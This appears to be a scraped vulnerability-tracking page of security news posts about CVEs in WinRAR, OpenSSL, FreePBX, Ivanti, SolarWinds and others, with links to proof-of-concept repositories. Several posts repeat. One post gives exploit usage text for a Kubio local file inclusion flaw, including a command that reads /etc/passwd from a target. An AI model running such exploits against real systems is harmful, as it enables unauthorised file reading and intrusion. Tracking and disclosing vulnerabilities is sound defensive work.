1 repos
https://github.com/mcorybillington/CVE-2025-64328_FreePBX-framework-Command-Injection
FortiGuard Labs analyses EncystPHP, a weaponized web shell delivering remote command execution, persistence and further web shell deployment. It spreads by exploiting FreePBX vulnerability CVE-2025-64328 and is linked to the INJ3CTOR3 actor. https://www.fortinet.com/blog/threat-research/unveiling-the-weaponized-web-shell-encystphp
##FortiGuard Labs analyses EncystPHP, a weaponized web shell delivering remote command execution, persistence and further web shell deployment. It spreads by exploiting FreePBX vulnerability CVE-2025-64328 and is linked to the INJ3CTOR3 actor. https://www.fortinet.com/blog/threat-research/unveiling-the-weaponized-web-shell-encystphp
##updated 2025-11-06T19:45:09.883000
2 posts
📰 Critical 1-Click RCE Flaw in IDIS Cloud Manager Puts Users at Risk
A critical 1-click RCE (CVE-2025-12556) found in IDIS Cloud Manager viewer. Attackers can execute code via a malicious link. CVSS score of 8.7. Users urged to update to v1.7.1 or uninstall immediately. 💻 #RCE #Vulnerability #CyberSecurity
##📢 CVE-2025-12556 : exécution de code en « 1 clic » dans IDIS Cloud Manager Viewer (Windows)
📝 Selon Team82, une faille critique dans IDIS Cloud Manager Viewer (ICM) permet une exécut...
📖 cyberveille : https://cyberveille.ch/posts/2026-01-27-cve-2025-12556-execution-de-code-en-1-clic-dans-idis-cloud-manager-viewer-windows/
🌐 source : https://claroty.com/team82/research/new-architecture-new-risks-one-click-to-pwn-idis-ip-cameras
#CVE_2025_12556 #IDIS_Cloud_Manager #Cyberveille
updated 2025-11-03T16:15:34.277000
1 posts
NetSupport Manager Zero-Day Flaws Enable Unauthenticated Remote Code Execution
NetSupport Manager versions prior to 14.12.0000 contain two critical vulnerabilities (CVE-2025-34164 and CVE-2025-34165) that allow unauthenticated remote code execution via an undocumented broadcast feature. Attackers can exploit these flaws to bypass security protections and gain full control over affected systems.
**Make sure your NetSupport Manager port is limited and access to port TCP 5405 is blocked or strictly isolated. Then plan an update to version 14.12.0000.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/netsupport-manager-zero-day-flaws-enable-unauthenticated-remote-code-execution-5-g-z-x-b/gD2P6Ple2L
updated 2025-10-30T15:50:59.680000
7 posts
27 repos
https://github.com/knight0x07/WinRAR-CVE-2025-8088-PoC-RAR
https://github.com/sxyrxyy/CVE-2025-8088-WinRAR-Proof-of-Concept-PoC-Exploit-
https://github.com/kitsuneshade/WinRAR-Exploit-Tool---Rust-Edition
https://github.com/Shinkirou789/Cve-2025-8088-WinRar-vulnerability
https://github.com/onlytoxi/CVE-2025-8088-Winrar-Tool
https://github.com/ilhamrzr/RAR-Anomaly-Inspector
https://github.com/travisbgreen/cve-2025-8088
https://github.com/DeepBlue-dot/CVE-2025-8088-WinRAR-Startup-PoC
https://github.com/lucyna77/winrar-exploit
https://github.com/xi0onamdev/WinRAR-CVE-2025-8088-Exploitation-Toolkit
https://github.com/ghostn4444/CVE-2025-8088
https://github.com/hexsecteam/CVE-2025-8088-Winrar-Tool
https://github.com/hbesljx/CVE-2025-8088-EXP
https://github.com/nuky-alt/CVE-2025-8088
https://github.com/Markusino488/cve-2025-8088
https://github.com/pentestfunctions/best-CVE-2025-8088
https://github.com/nhattanhh/CVE-2025-8088
https://github.com/walidpyh/CVE-2025-8088
https://github.com/pentestfunctions/CVE-2025-8088-Multi-Document
https://github.com/pexlexity/WinRAR-CVE-2025-8088-Path-Traversal-PoC
https://github.com/Ashwesker/Ashwesker-CVE-2025-8088
https://github.com/jordan922/CVE-2025-8088
https://github.com/pescada-dev/-CVE-2025-8088
https://github.com/papcaii2004/CVE-2025-8088-WinRAR-builder
https://github.com/0xAbolfazl/CVE-2025-8088-WinRAR-PathTraversal-PoC
https://github.com/AdityaBhatt3010/CVE-2025-8088-WinRAR-Zero-Day-Path-Traversal
📦 That WinRAR "Free Trial" You Never Paid For? Hackers Are Exploiting It Right Now 🚨
A WinRAR vulnerability patched last July (CVE-2025-8088) is still being actively exploited by Russian APTs, Chinese threat actors, and cybercrime gangs six months later. The path traversal flaw lets attackers slip malicious files into your system when you extract seemingly innocent archives. If you're still using WinRAR, update immediately or switch to 7-Zip.
Sources:
- https://www.bleepingcomputer.com/news/security/winrar-path-traversal-flaw-still-exploited-by-numerous-hackers/
- https://cloud.google.com/blog/topics/threat-intelligence/exploiting-critical-winrar-vulnerability
- https://nvd.nist.gov/vuln/detail/CVE-2025-8088
- https://www.helpnetsecurity.com/2026/01/28/winrar-vulnerability-exploited-cve-2025-8088/
---
🔓 Critical OpenSSL Flaw Could Let Hackers Take Over Your Computer Via Email 💀
CVE-2025-15467 is a critical 9.8 CVSS remote code execution vulnerability in OpenSSL's CMS and S/MIME message processing. OpenSSL powers encrypted communications across the entire internet, and this flaw allows unauthenticated attackers to execute arbitrary code remotely without any credentials. A working proof-of-concept already exists in the wild, meaning both defenders and attackers have access to it.
Sources:
- https://nvd.nist.gov/vuln/detail/CVE-2025-15467
https://www.infosecurity-magazine.com/news/12-openssl-flaws/
- https://openssl-library.org/news/vulnerabilities/
- https://twitter.com/IntCyberDigest/status/2016288593547833778
---
🤦 SolarWinds Ships Critical Vulnerabilities In Their Own Software (Yes, THAT SolarWinds) 🤡
SolarWinds, the company that became the poster child for supply chain attacks after their 2020 breach, just disclosed four critical vulnerabilities in their Web Help Desk product. The flaws include unauthenticated remote code execution and authentication bypass that can be chained together to completely compromise systems without logging in. Five years after congressional hearings and intense security scrutiny, they still shipped this mess.
Sources:
- https://www.bleepingcomputer.com/news/security/solarwinds-warns-of-critical-web-help-desk-rce-auth-bypass-flaws/
- https://www.helpnetsecurity.com/2026/01/29/solarwinds-web-help-desk-rce-vulnerabilities/
- https://www.rapid7.com/blog/post/etr-multiple-critical-solarwinds-web-help-desk-vulnerabilities-cve-2025-40551-40552-40553-40554/
- https://nvd.nist.gov/vuln/detail/CVE-2025-40552
- https://nvd.nist.gov/vuln/detail/CVE-2025-40553
- https://nvd.nist.gov/vuln/detail/CVE-2025-40554
- https://nvd.nist.gov/vuln/detail/CVE-2025-40551
📦 That WinRAR "Free Trial" You Never Paid For? Hackers Are Exploiting It Right Now 🚨
A WinRAR vulnerability patched last July (CVE-2025-8088) is still being actively exploited by Russian APTs, Chinese threat actors, and cybercrime gangs six months later. The path traversal flaw lets attackers slip malicious files into your system when you extract seemingly innocent archives. If you're still using WinRAR, update immediately or switch to 7-Zip.
Sources:
- https://www.bleepingcomputer.com/news/security/winrar-path-traversal-flaw-still-exploited-by-numerous-hackers/
- https://cloud.google.com/blog/topics/threat-intelligence/exploiting-critical-winrar-vulnerability
- https://nvd.nist.gov/vuln/detail/CVE-2025-8088
- https://www.helpnetsecurity.com/2026/01/28/winrar-vulnerability-exploited-cve-2025-8088/
---
🔓 Critical OpenSSL Flaw Could Let Hackers Take Over Your Computer Via Email 💀
CVE-2025-15467 is a critical 9.8 CVSS remote code execution vulnerability in OpenSSL's CMS and S/MIME message processing. OpenSSL powers encrypted communications across the entire internet, and this flaw allows unauthenticated attackers to execute arbitrary code remotely without any credentials. A working proof-of-concept already exists in the wild, meaning both defenders and attackers have access to it.
Sources:
- https://nvd.nist.gov/vuln/detail/CVE-2025-15467
https://www.infosecurity-magazine.com/news/12-openssl-flaws/
- https://openssl-library.org/news/vulnerabilities/
- https://twitter.com/IntCyberDigest/status/2016288593547833778
---
🤦 SolarWinds Ships Critical Vulnerabilities In Their Own Software (Yes, THAT SolarWinds) 🤡
SolarWinds, the company that became the poster child for supply chain attacks after their 2020 breach, just disclosed four critical vulnerabilities in their Web Help Desk product. The flaws include unauthenticated remote code execution and authentication bypass that can be chained together to completely compromise systems without logging in. Five years after congressional hearings and intense security scrutiny, they still shipped this mess.
Sources:
- https://www.bleepingcomputer.com/news/security/solarwinds-warns-of-critical-web-help-desk-rce-auth-bypass-flaws/
- https://www.helpnetsecurity.com/2026/01/29/solarwinds-web-help-desk-rce-vulnerabilities/
- https://www.rapid7.com/blog/post/etr-multiple-critical-solarwinds-web-help-desk-vulnerabilities-cve-2025-40551-40552-40553-40554/
- https://nvd.nist.gov/vuln/detail/CVE-2025-40552
- https://nvd.nist.gov/vuln/detail/CVE-2025-40553
- https://nvd.nist.gov/vuln/detail/CVE-2025-40554
- https://nvd.nist.gov/vuln/detail/CVE-2025-40551
Google’s Threat Intelligence Group warns WinRAR CVE-2025-8088 is still being actively exploited for initial access and payload delivery by both state-backed and financially motivated actors. The exploitation method allows files to be dropped into the Windows Startup folder. https://cloud.google.com/blog/topics/threat-intelligence/exploiting-critical-winrar-vulnerability
##WinRAR Path Traversal Bug Actively Exploited in New Campaign
Hackers are once again using a WinRAR flaw (CVE-2025-8088) to drop malware into Windows Startup folders for persistent access. This bug affects government, military, and financial sectors worldwide as attackers exploit unpatched software.
**This is important and urgent! If you use WinRAR, update it to version 7.13 or later from the official WinRAR, because hackers are sending malicious archive attachments and if you open them you are hacked. Also, be very careful with any RAR file attachments in emails, especially unexpected ones.**
#cybersecurity #infosec #attack #activeexploit
https://beyondmachines.net/event_details/winrar-path-traversal-bug-actively-exploited-in-new-campaign-c-7-n-b-8/gD2P6Ple2L
Hackers are using a single booby-trapped archive file to sneak malware past security tools and hide it where you would never think to look. Here is how the WinRAR flaw is letting them get away with it
##WinRAR path traversal flaw still exploited by numerous hackers
Multiple threat actors, both state-sponsored and financially motivated, are exploiting the CVE-2025-8088 high-severity vulnerability in WinRAR for...
🔗️ [Bleepingcomputer] https://link.is.it/dx1ikK
##New. Self-promotion goes without saying, never mind the all-invasive Gmail AI.
😂 "We also recommend the use of Google Safe Browsing and Gmail, which actively identifies and blocks files containing the exploit."
Google Threat Intelligence Group: Diverse Threat Actors Exploiting Critical WinRAR Vulnerability CVE-2025-8088 https://cloud.google.com/blog/topics/threat-intelligence/exploiting-critical-winrar-vulnerability #Google #windows #Microsoft #threatintel #threatintelligence
##updated 2025-10-24T13:54:58.783000
2 posts
10 repos
https://github.com/Ashwesker/Ashwesker-CVE-2025-0282
https://github.com/almanatra/CVE-2025-0282
https://github.com/watchtowrlabs/CVE-2025-0282
https://github.com/absholi7ly/CVE-2025-0282-Ivanti-exploit
https://github.com/rxwx/pulse-meter
https://github.com/punitdarji/Ivanti-CVE-2025-0282
https://github.com/Hexastrike/Ivanti-Connect-Secure-Logs-Parser
https://github.com/AdaniKamal/CVE-2025-0282
☕ & #threatintel - Two campaigns (100x spike!) are hitting Ivanti Connect Secure; one loud (34K sessions from Romania/Moldova), one stealthy (~6K distributed IPs). Both target a pre-exploitation endpoint for CVE-2025-0282. https://www.labs.greynoise.io/grimoire/2026-01-29-inside-the-infrastructure-whos-scanning-for-ivanti-connect-secure/
##☕ & #threatintel - Two campaigns (100x spike!) are hitting Ivanti Connect Secure; one loud (34K sessions from Romania/Moldova), one stealthy (~6K distributed IPs). Both target a pre-exploitation endpoint for CVE-2025-0282. https://www.labs.greynoise.io/grimoire/2026-01-29-inside-the-infrastructure-whos-scanning-for-ivanti-connect-secure/
##updated 2025-09-02T15:55:35.520000
1 posts
NetSupport Manager Zero-Day Flaws Enable Unauthenticated Remote Code Execution
NetSupport Manager versions prior to 14.12.0000 contain two critical vulnerabilities (CVE-2025-34164 and CVE-2025-34165) that allow unauthenticated remote code execution via an undocumented broadcast feature. Attackers can exploit these flaws to bypass security protections and gain full control over affected systems.
**Make sure your NetSupport Manager port is limited and access to port TCP 5405 is blocked or strictly isolated. Then plan an update to version 14.12.0000.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/netsupport-manager-zero-day-flaws-enable-unauthenticated-remote-code-execution-5-g-z-x-b/gD2P6Ple2L
updated 2025-03-28T18:11:40.180000
1 posts
9 repos
https://github.com/fumioryoto/CVE-2025-2294-Kubio-2.5.1-LFi-Checker
https://github.com/0xWhoami35/CVE-2025-2294
https://github.com/rhz0d/CVE-2025-2294
https://github.com/iteride/CVE-2025-2294
https://github.com/Yucaerin/CVE-2025-2294
https://github.com/romanedutov/CVE-2025-2294
https://github.com/mrrivaldo/CVE-2025-2294
‼️ CVE-2025-2294: Kubio AI Page Builder <= 2.5.1 - Unauthenticated Local File Inclusion
GitHub: https://github.com/fumioryoto/CVE-2025-2294-Kubio-2.5.1-LFi-Checker
CVSS: 9.8
Usage:
usage: exploit.py [-h] -u URL [-f FILE]
options:
-h, --help show this help message and exit
-u URL, --url URL Target base URL (e.g., https://example.com)
-f FILE, --file FILE File to read (default: /etc/passwd)
Example:
python3 exploit.py -u https://example.com -f /etc/passwd
##updated 2024-11-01T15:30:13.770000
1 posts
1 posts
3 repos
https://github.com/ksk-itdk/KSK-ITDK-CVE-2026-21509-Mitigation
⚪ Microsoft rushes to fix Office 0-day vulnerability actively exploited by hackers
🗨️ Microsoft developers have released out-of-band patches for a critical Office vulnerability that is already being actively exploited in attacks. The issue affects almost all versions of the product—from Office 2016 to Microsoft 365 Apps for Enterprise.
##Johnson Controls Patches Critical SQL Injection Flaw in Metasys Building Automation
Johnson Controls reports a critical command injection vulnerability (CVE-2025-26385) in its Metasys building automation products that allows unauthenticated remote SQL execution. The flaw enables attackers to alter or delete data across critical infrastructure sectors including energy and government facilities.
**If you are using Johnson Controls Metasys systems, review this advisory in detail. Make sure all industrial devices are isolated from the internet and accessible from trusted networks only. Close TCP port 1433 immediately and apply the GIV-165989 patch to prevent unauthenticated database takeovers.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/johnson-controls-patches-critical-sql-injection-flaw-in-metasys-building-automation-s-h-g-x-7/gD2P6Ple2L
🔴 CVE-2026-24841 - Critical (9.9)
Dokploy is a free, self-hostable Platform as a Service (PaaS). In versions prior to 0.26.6, a critical command injection vulnerability exists in Dokploy's WebSocket endpoint `/docker-container-terminal`. The `containerId` and `activeWay` parameter...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24841/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-24741 - High (8.1)
ConvertXis a self-hosted online file converter. In versions prior to 0.17.0, the `POST /delete` endpoint uses a user-controlled `filename` value to construct a filesystem path and deletes it via `unlink` without sufficient validation. By supplying...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24741/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-22259 - High (7.5)
Suricata is a network IDS, IPS and NSM engine. Prior to versions 8.0.3 and 7.0.14, specially crafted traffic can cause Suricata to consume large amounts of memory while parsing DNP3 traffic. This can lead to the process slowing down and running ou...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-22259/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2025-68670 - Critical (9.1)
xrdp is an open source RDP server. xrdp before v0.10.5 contains an unauthenticated stack-based buffer overflow vulnerability. The issue stems from improper bounds checking when processing user domain information during the connection sequence. If ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-68670/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##